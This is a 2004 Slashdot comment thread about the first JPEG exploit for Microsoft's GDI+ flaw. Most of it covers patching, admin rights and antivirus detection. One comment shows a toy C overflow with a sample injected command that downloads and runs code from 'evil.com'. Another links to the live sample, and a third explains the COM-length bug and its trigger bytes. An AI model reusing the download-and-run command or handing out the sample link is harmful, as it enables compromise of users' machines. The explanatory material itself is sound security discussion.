First JPEG Virus Posted To Usenet

Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."

Can be prevented...

[pbranes (565105)]

Update your systems now! The patch has been out for several weeks. I have already applied it to my corporation via SUS (which is free) [microsoft.com] and am rolling out the office patch now, as well. There is no reason other than laziness or sysadmin ignorance for this to be another massive virus attack.

Re:Can be prevented...

[Zocalo (252965)]

Yes it has. Unfortunately like many Microsoft patches it gives you a nice fuzzy sense of false security. According to Microsoft, I'm nice and safe, but according to Tom Liston's GDIScanner [sans.org] and a quick perusal of the file versions, I'm quite possibly not. Fortunately my virusscanner *does* seem to pick up on this, but that's no thanks to Microsoft.

Re:Can be prevented...

[Saratoga C++ (456351)]

Sorry to burst your bubble dude, but that patch only fixed the system's instance of GDI+ There are a ton of apps that have their own version of GDI+ built on their own app path. just because you use the patch that doesn't mean that its actually fixed.

Say your using app X that uses GDI+ to render its own image stuff (say its a picture album maker). It keeps its own version of GDI+ that the developers extended for their own reasons. This GDI+ is vonerable. After patching this older version of GDI+ is still on your system so that app is vonerable...

So buyer beware.

Re:Can be prevented...

[by Anonymous Coward]

while we're bursting bubbles, the patch from microsoft contains a tool that scans your hard disk for all vulnerable gdi dlls.

Another bubble bites the dust! It detects, but does not fix the problem. Nor does it even tell you where the problem is. This was covered earlier today [slashdot.org].

I don't see why this is a problem

[bconway (63464)]

If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

Re:I don't see why this is a problem

[gl4ss (559668)]

why it's a problem? because people do run with admin priviledges.

I hate to break it to you but normal people don't know or care about things like that.
.

Re:I don't see why this is a problem

[rufo (126104)]

Yeah, that's all well and good - except for the fact that Windows sets up users by default as administrators, as does every OEM to ship a Windows PC, and without any explanation as to why this is or why it might just be a bad idea.

Until Microsoft stops shipping the OS wide-open for anyone to do anything they want, these kind of attacks will continue. Apple's gotten it much more right in this regard - even as a Mac user I don't think Mac OS X is particularly more secure then any other *nix or even Windows (just less analyzed), but at least Apple doesn't ship with any services turned on or allow admin users willy-nilly access over the entire system (most admin settings and files require password confirmation before continuing - not foolproof by any means but a huge step in the right direction), as do most good Unices these days.

But of course not Windows. ;-)

Re:I don't see why this is a problem

[Etcetera (14711)]

At the risk of being kicked off Slashdot for being a devil's advocate... ;)

If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

Why shouldn't I be able to run as an administrator on my own machine? It's my computer... I paid for it... I'm the only one using it. If the system is insecure, isn't that the system's fault? Am I to be blamed for operating my computer in a fashion that (*gasp*) allows me to make changes to it when I want without it bitching to me any further?

Think bigger. Think to the future. "Don't log in as root/Don't be an administrator." is NOT an answer. Mac OS 9 and below operated by default in a single-user mode without *any* authentication necessary to make changes and I can list the successful viruses/exploits (especially remote exploits) by hand on a single sheet of paper.

Artificial permission models (where "artificial" means "not needed by the environment") are not panaceas and aren't excuses for poor OS design.

Re:I don't see why this is a problem

[Waffle Iron (339739)]

If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

It can still do anything the user can do, including installing itself in the user's account space, setting itself to run every time the user logs on, uploading all of the files the user can access, logging the user's keystrokes, sending email, pinging for other systems, etc. Running as a non-administrator is not a panacea.

Re:I don't see why this is a problem

[HuguesT (84078)]

All well and good but many things don't work in windows if you are not an administrator.

I find it incredible that reputable developers like ID software for example require the latest demo of Doom 3 to be *installed* AND *run* as an administrator. The demo readme states this explicitely.

Yes I do know about "Run As" but what are these people thinking? Administrator is for administrative tasks, not for playing games.

No wonder XP is such a debacle area security wise.

clamav and nav detect it

[Indy1 (99447)]

clamscan possibleVirus.jpg
possibleVirus.jpg: Exploit.JPEG.Comment FOUND

----------- SCAN SUMMARY -----------
Known viruses: 24607
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
I/O buffer size: 131072 bytes
Time: 0.501 sec (0 m 0 s)

also updated nav corp 8 with latest defs (9/27/04) and it found it. AVG free edition doesnt as of yet.

Imagine for a moment....

[Hardwyred (71704)]

your neighbors open accesspoint, a copy of Airpwn [evilscheme.org] and a suitably infected jpeg. Sounds like a pretty nasty situation in the making to me.

Screenshots...

[tajmorton (806296)]

No Screenshots, please!

alt.binaries.erotica.beanie-babies

[drachenfyre (550754)]

Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.

Re:alt.binaries.erotica.beanie-babies

[marko123 (131635)]

Were you around during the height of the popularity of alt.tasteless.hamster.duct_tape or alt.swedish.chef.bork.bork.bork?

Those were the days. Anyone go to Level 17 on gopher?

Not particularly well coded

[crazyray (776321)]

If you read through the actual posting, it is apparent that this while may be the first GDI/JPEG-based worm, but it is certainly not going to be the worst. First of all, unless I missed it- this code does not even self-replicate (i.e.- it doesnt mail itself to others, or post itself to usenet, or otherwise exploit vulnerable systems) I would expect to see some script kiddies combine this proof of concept trojan with some social engineering type email worms, and then t**THAT** will be a nasty worm.

Re:Not particularly well coded

[djeca (670911)]

Just had a nasty thought... the latest round of IM programs have user-settable "buddy icons" which IIRC can be JPEGs. A worm that used buddy icons to spread could have half the internet infected in 15 minutes, and do it via existing social networks. I hope the MSN and AIM servers are scanning buddy icons to prevent this being used...

The joys of keeping a campus virus-free

[iamlucky13 (795185)]

Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing on plenty of guy's asking for help getting this removed, after finding out pornstars aren't virus free after all.

Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket liscence of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from buidling to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.

Microsoft Patch

[bcreane (667034)]

FYI, here's the fix from M$ for this exploit: Security Bulletin [microsoft.com]

NX Protection?

[rsmith-mac (639075)]

Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.

Re:NX Protection?

[by Anonymous Coward]

I can't speak for this virus specifically, but DEP isn't the end-all-be-all of buffer overflow prevention. For example:

char overflowed[10];
char command="echo \"some silly command\"";

int main(){
strcpy(argv[1], overflowed);
exec(command);
}

We can overflow overflowed to change command into something like "sh \"wget http:\\evil.com\virus > virus.sh;virus.sh\"" or somesuch. Bonus points if you diddle with the C library's jump table so that any system call ends up being exec(..). The key here is that no data segments are executed, so NX protection wouldn't help.

Sex!

[InfiniteWisdom (530090)]

What, now you can't even WATCH sex without protection?

Lament from an old-timer

[bigberk (547360)]

In my day, an article like this would have been a downright joke. Seriously, this is such a milestone that I'm filing the article in my permanent news archives.

In retrospect I don't know why we thought such a thing was impossible for so long? After all, buffer overflows or other coding problems can result in malicious code executing. I guess what we didn't expect "back then" was that computers primarily engaged in networking activities would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself, with administrator level privileges.

Wouldn't it make sense to limit the scope of any kind of modular parser/crypto using privilege isolation, so that even if malicious code starts running it is utterly incapable of affecting anything else?

i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket? Hell, couldn't Windows do just that and wrap it up so API users don't notice? What am I missing here? I'm not picking on Windows here, same thing could be done on *NIX.

Hacked CNN Advertisments

[8400_RPM (716968)]

So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?

Millions of instant zombies.

Thats f*cking scarry....

Re:Anyone have a working copy?

[JS_RIDDLER (570254)]

In the article the virus.txt has a jpeg sample in code.

Re:Anyone have a working copy?

[Three Headed Man (765841)]

I extracted the bad code, but I'm having trouble getting it to run in WINE.

Just one more reason Linux isn't ready for the desktop.

Re:Anyone have a working copy?

[HermanAB (661181)]

Yah, Linux is boring - it just works...

Windows Users have all the fun!

app not working != app vulnerable to virus

[sczimme (603413)]

* Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
* Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
* Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
* Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background

These programs are not vulnerable to the the exploit in the same way that Windows machines are vulnerable. In fact, the issues you saw appear to be in no way related to the intended result of the virus. GIMP's segfault seems to be the most serious of these, and it is still a minor problem. I believe all of your results can be achieved by opening a mangled/corrupted .jpg; the exploit code is irrelevant.

Nutshell: One cannot conclude that graphics-related processes/apps on Linux machines are vulnerable to this virus.

PS Conclusions posited based on "unprofessional research and wild conjectures" are likely to cause much more harm than good. Is this really necessary? (not a flame - just an observation)

Re:Anyone have a working copy?

[by Anonymous Coward]

http://easynews.com/test/possiblevirus.jpg.gz

Got the link from bugtraq a few hours ago.

Re:Anyone have a working copy?

[Tyrdium (670229)]

Heh, Norton Antivirus wouldn't even let me try it. The heuristics grabbed it before it was even on my desktop. Now [i]that[/i] is impressive.

Re:Anyone have a working copy?

[rainman_bc (735332)]

Mine too... Totall impressive. What's even more impressive is the ability to use standard html tags on slashdot :)

God dammit!

[by Anonymous Coward]

Why doesn't slashdot allow you to post images! :)

Re:Anyone have a working copy?

[Anonymous Freak (16973)]

Well, Apple's Preview (as of 10.3.5 with all the latest updates as of 6:00 PM PDT, 9/27/04,) says it's not a supported file type.

Graphic Converter complains that "Some parts of the file may be missing."

Safari displays a blank page, with no errors.

In all cases, I can't find any file-system goofiness. (And the free-with-DotMac Virex doesn't detect it as a virus.)

(The offending "virus" is available as a linked-to zip file in the linked virus.txt page.)

Re:Anyone have a working copy?

[Yaztromo (655250)]

I want to see what GraphicConverter does with this.

Absolutely nothing. The file is only 8KB in size, and doesn't appear to contain any actual image data. Loading it up in GraphicConverter v4.9 over here (and Preview, and a number of other tools) just reports that the image file is corrupt.

Yaz.

Re:Anyone think it's interesting...

[Yaztromo (655250)]

Apple really has come a long way around here, eh?

For the record, I bought my first Mac (a 12" PowerBook G4) this past spring based in significant part on all the good things I had read about Apple's latest offerings here on /. .

Yaz.

The answer is...

[Leomania (137289)]

yes, if you haven't updated to the latest version.

See this [slashdot.org] Slashdot thread.

- Leo

Re:Just begging to be sued

[toetagger1 (795806)]

Google [google.com] finds a whole lot of exploids for this guy. Ranging from apache to AIM away message buffer over runs.

Re:Just begging to be sued

[lukewarmfusion (726141)]

"Can't arrest someone for merely writing a piece of code."

coughcoughpatriotactcoughcough

Re:That's pretty amazing.

[mini me (132455)]

Hopefully mozilla decodes the jpgs itself before rendering them on windows.

It does. But Mozilla had almost the exact same problem with both BMP and PNG in the last week or two. So it's not just Microsoft who has vulnerable image decoders.

Re:That's pretty amazing.

[ConceptJunkie (24823)]

This reminds me of my first thought when I saw Windows 95 message "It is now safe to turn off your computer."

Which was, "However it is no longer safe to turn on your computer."

Quality freefall.

Really, how much new useful functionality has MS provided in the last 5 years? It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory. Functionality increases at best in a linear fashion, while system requirements increase at a geometric rate. Software eats more of your computer and offers less in return.

Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurance of gaping new exploits increased significantly.

Maybe they should shut down for a year. Take all the gigabyte-gobbling shit they've written for the last 10 years and turn it into useful code with no new functionality. Returning with the same stuff they have now, but with little or no security issues would win them more customers than their current monopolistic policies and FUD spreading ever will.

Really, what else could they possibly do besides introduce a bunch of bloated new technologies for doing the same damn thing we all wrote for ourselves years ago, but without all the MS lock in and huge learning curve?

I have to ask, what has MS done that is actually useful since Windows 2000?

Re:That's pretty amazing.

[craXORjack (726120)]

It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory.

I'm glad I'm not the only one who noticed this. btw cpu's are way faster than 10x faster. In 1994 I could only afford a 386sx at 16Mhz. Not only is the clock speed faster but the chip has gone through several major revisions. Yet I think that 386sx booted up faster and ran Lotus and Wordperfect under DOS just as fast as anything out there on Windows today. Of course there are some advantages to windows but speed sure isn't one of them!

Re:That's pretty amazing.

[ConceptJunkie (24823)]

The real kicker was when I switched to Outlook 2003 from Outlook Express. From a usability point of view, it was a pretty good improvement, especially the spam handling, but with a fairly large message store, it took at least an order of magnitude longer to access folders, etc, in O2k3 than OE. It was absurd. Oh, yeah, and the fact that an O2k3 data store can't be bigger than about 1GB to 1.5GB before it starts losing messages (I couldn't believe this at first but it was confirmed by two people with much more MS experience than me). I switched to Thunderbird around 0.5 and haven't given it a second thought.

Now here's a case where the MS software really was well-designed and easy to use (from a UI standpoint), but the grotesque slowness of the app killed it for me.

In 1994, I had a 50MHz 486SX... I didn't buy a Pentium 100 until '96, so you're right. Clock speed is more like 40 - 60 times faster (and thanks to wonders of CISC, performance is more than that). And disk space has increased for me by 3 orders of magnitude.

I seem to recall MicroCenter or CompUSA having a "Buck-a-Meg" sale and I bought a 340MB drive for $340, bringing my total to a whopping 580MB. Now I've got about 600GB over about 4 machines, maybe more since each box is crammed full of old drives ranging from 7GB to 250GB etc in addition to a few bigger drives.

I used to hate how my Amiga took like 3 minutes to boot back in the late 80's. Windows 2000 on a machine that was 100 times faster took around the same time. XP is much better, but still, there are times when I have a lot of apps loaded and it just seems to go out to lunch for several seconds before anything responds. And don't get me started on the launch time for Word 2003...

Re:That's pretty amazing.

[Doyle (620849)]

I have to ask, what has MS done that is actually useful since Windows 2000?

You mean, apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, and public health?

Oh, wait - that was the Romans :P

Re:That's pretty amazing.

[IchBinEinPenguin (589252)]

Returning with the same stuff they have now, but with little or no security issues

Sorry, that won't work.

Some of the stuff is insecure by design!. Not "designed to be insecure", just "impossible to secure given the design".

Take ActiveX: running binary code downloaded from a anywhere without a JVM-like sandbox is insecure. Not matter how many digital signatures, OK dialog boxes and warnig messages you add, some (most?) users WILL simply click through all the warnings and have their boxes 0wn3d.

Design has tradeoffs between security, performance, usability etc. etc. Some of this stuff you can't fix without changing the basic design (i.e. starting from scratch)

Re:That's pretty amazing.

[Tony-A (29931)]

"It is now safe to turn off your computer." ... Quality freefall.

It's related.
There is an arrogance that Microsoft knows best that is implicit in that statement. Whether or not it is actually safe to turn off the computer is very much outside of Microsoft's knowledge. In fact the safest thing to do when a system is acting bonkers is to hit reset or the power switch on old computers or pulling the power plug or removing the battery on new compouter where the power switch is no longer functional. The reasoning goes that when the system has its brains scrambled it desperately wants to write those scrambled brains to disk and thus perpetuate the scramble.

Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurance of gaping new exploits increased significantly.

One whole month, Well golly gee! Actually one month would be enough to stop hiding stuff and never under any circumstance use or require scripts or ActiveX controls for anything remotely related to security.
[x] Hide files extension for known file types.
That by itself is enough to wreck any attempts at achieving security. The message is loud and clear. Linux worms never seem to get anywhere. People see them and react violently to anything sneaking around trying to be invisible.

Task Manager doesn't show everything. Microsoft Windows comes with a pre-installed root kit!

Re:bug month

[ConceptJunkie (24823)]

"Quality freefall"? Not really. They've always produced third tier code.

I dunno. NT 3.51 always seemed to be rock-frickin'-solid, but then I didn't use it for long before NT 4 came out.

Of course, Windows 95 was stillborn and they kept pumping the corpse full of formaldehyde for 5 years for they finally let it rot in peace, but the NT branch was really good until they started making every app they wrote effectively part of the core OS.

Remember when NT ran on 4 different processor architectures and Win32 was just one API on top of the kernel in addition to Posix and OS/2? Now that IE and WMP are practically part of the kernel it seems so long ago, and yet, in a sense, it was far more advanced because it was modular enough and clean enough to be ported.

Re:That's pretty amazing.

[datawar (200705)]

Are you serious? Of course Slashdot covered those stories too.

Critical Mozilla, Thunderbird Vulnerabilities [slashdot.org]

CERT Warns Of Multiple Vulnerabilities In Libpng [slashdot.org]

Re:Nothing's safe anymore

[bergeron76 (176351)]

So does this qualify it as a Sexually Transmitted Disease (STD)?!?

Drat!!!

Re:how and what

[MillionthMonkey (240664)]

you're a goddamn idiot. a suitably constructed jpeg will cause an overflow in the gdi+ library which ie and most msft programs use to render jpegs, when that happens the jpeg can be made such that the overflow will cause virus code to be loaded. god you're an idiot.

Jesus, an obvious end user asks a perfectly legitimate question and you call him an idiot for being surprised by the notion of a hostile JPEG- something that should rightfully amaze everybody. I doubt he understood your high level description. To the grandparent: here is a meandering crappy description of how a buffer overflow attack works:

A function call, in C, pushes the current program counter on the stack. Then it pushes the arguments onto the stack, and control jumps to the function which pops the arguments off the stack and does whatever with them. At the end it invokes a RET instruction that pops the program counter back off the stack and control jumps to the address there (to the point right after the CALL). These are just normal C calling conventions.

Variables defined in the function are stored on the stack. If a string like a URL (for example) needs to be defined, a buffer is allocated for it there. When the function returns, the space is automatically deallocated, the RET pops the program counter off the stack, and the function call returns. By default no bounds checking is done on data stored in these buffers. Some library functions, like gets(), don't do bounds checking. They can't, since they don't know the buffer size and would need to have it provided as an argument. Newer, safer versions exist that do take buffer size arguments, but that means these aren't the same library functions anymore. (FWIW the gets() call takes a pointer to a buffer of unknown size as an argument, reads a newlined string from stdin into the buffer, and returns the buffer pointer that was passed to it.)

It's up to the programmer to do bounds checking if he uses library calls vulnerable in this way. But this is extra work, and people are lazy. It's easier to just allocate a big, big buffer that's probably larger than you'll ever need, that "no reasonable URL" will ever exceed. So the programmer allocates a fixed 10K buffer on the stack and passes its address to a library function like gets().

The attacker gains control in these situations by creating a program input like a long, carefully crafted URL, slightly longer than 10K, that overflows the buffer inside the library function. The goal is to overwrite the return address on the stack with an address that's within the buffer. In the case of the Code Red worm, someone meticulously put together a URL that attacked an obscure ISAPI routine, and not only overwrote the return address, but also had machine code instructions waiting at the replacement address within the buffer- encoded right into the damn URL! (The buffer has been deallocated at this point, but hasn't been zeroed, so it's still there.)

It's harder to explain with a JPEG than with a URL. But a JPEG contains variable length data structures that are read into buffers on the stack. Someone writing the JPEG decoder forgot to do a bounds check- and so a mundane function for decoding JPEGs never returns. Instead it jumps into an endless loop that's been placed within the image buffer by the attacker.

So yes it is a bit like running an .EXE file, except for the fact that the code is hiding inside what is supposed to be data, not code, and it gains control of the CPU by smashing the stack.

Older versions of Notepad gagged on files larger than 64K, which seems suspicious. It's theoretically possible that a vulnerability could exist even in a text editor like Notepad allowing a carefully constructed .TXT file to execute arbitrary code. Who knows?

Re:how and what

[MillionthMonkey (240664)]

Here are the low level details of the JPEG exploit: [seclists.org]

JPEG Comment sections (COM) allow for the embedding of comment data into a JPEG image. COM sections are marked beginning with 0xFFFE followed by a 16 bit unsigned integer in network byte order giving the total comment length + the 2 bytes for the length field; a single JPEG COM section could therefore contain 65533 bytes of invisible data (invisible in the sense that it's not rendered as part of the image). Because the JPEG COM field length variable is 2 bytes wide, and itself is included in the length value, the minimum value for this field is 2, this implies an empty comment. If the comment length value is set to 1 or 0, a buffer overflow occurs overwriting heap management structures.

The problem is GDIPlus normalizes the COM length prior to checking it's value; a starting length of 0 becomes -2 after normalization (0xFFFE unsigned), this value is converted to the 32 bit value 0xFFFFFFFE and is eventually passed on to memcpy which attempts to copy ~4G bytes into heap memory.

eEye Digital Security analyzed the bug and found that heap management structures are left in an inconsistent state with execution eventually reaching heap unlink instructions within RTLFreeHeap with EAX pointing to a pointer to data we control and we have direct control of EDX.

Detection could be accomplished by examining the JPEG image for the following byte sequence:

0xFF 0xFE 0x00 0x00 or 0xFF 0xFE 0x00 0x01

So you see what happened. The unchecked library call in this case was memcpy(). The decoder trusts its input and sends a small signed integer (-2) off to memcpy() without checking the sign bit- and memcpy() thinks -2 is a huge unsigned integer (4294967294). What's the difference? Any reasonable number is going to be positive anyway, right? Who would give a comment a negative length!

I saw someone make this kind of goof even in Java, where you have signed-only types forced on you. Someone forgot that InputStream.read() returns an unsigned byte as an int (between 0-255), and they cast it to a signed byte and back without the &0xFF to zero out the 24 high bits. That got caught right before our product release. The consequence in that case would have been a hash algorithm with inconsistent output between stream and byte array inputs- not a security nightmare like this, but a long lasting migraine nevertheless.